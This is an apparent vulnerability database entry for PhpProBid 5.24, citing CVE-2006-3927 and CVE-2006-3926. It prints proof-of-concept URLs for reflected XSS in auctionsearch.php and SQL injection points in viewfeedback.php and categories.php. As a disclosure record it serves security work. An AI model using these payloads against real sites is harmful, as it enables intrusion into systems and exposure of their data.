Phpprobid <= 5.24 XSS SQL injection Vulnerability

Vulnerability ID: 1053167
Vulnerability type:
Published: 2006-08-01
Updated: 2006-08-01
CVE ID: CVE-2006-3927, CVE-2006-3926
CNNVD-ID: N/A
Platform: N/A
CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2006080007
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
Phpprobid 5.24
http://www.phpprobid.com
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script>
http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/viewfeedback.php?view=1'[SQL]
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]
http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org